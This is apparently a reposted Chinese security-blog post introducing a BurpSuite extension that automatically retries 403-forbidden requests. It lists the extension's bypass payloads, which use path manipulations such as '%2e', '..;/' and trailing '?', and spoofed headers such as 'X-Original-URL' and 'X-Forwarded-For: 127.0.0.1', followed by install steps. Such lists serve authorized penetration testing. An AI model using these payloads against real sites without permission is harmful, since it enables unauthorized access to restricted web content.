Burpsuite扩展绕过403受限目录

admin 2022年8月27日14:54:05评论35 views字数 768阅读2分33秒阅读模式

一个burpsuite扩展,用于绕过403受限制的目录。通过使用PassiveScan(默认启用),此扩展将自动扫描每个403请求,因此只需添加到burpsuite中即可。

下载链接:sting8k/BurpSuite_403Bypasser

payloads:$ 1:HOSTNAME $ 2:PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

安装

BurpSuite -> Extender

-> Extensions

-> Add

-> Extension Type: Python

-> Select file: 403bypasser.py

-> Next till Finish

Burpsuite扩展绕过403受限目录

文章转自https://zhuanlan.zhihu.com/p/337867355
侵权联系删除

扫码进交流群

Burpsuite扩展绕过403受限目录

原文始发于微信公众号(菜鸟学安全):Burpsuite扩展绕过403受限目录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月27日14:54:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Burpsuite扩展绕过403受限目录http://cn-sec.com/archives/1258090.html

发表评论

匿名网友 填写信息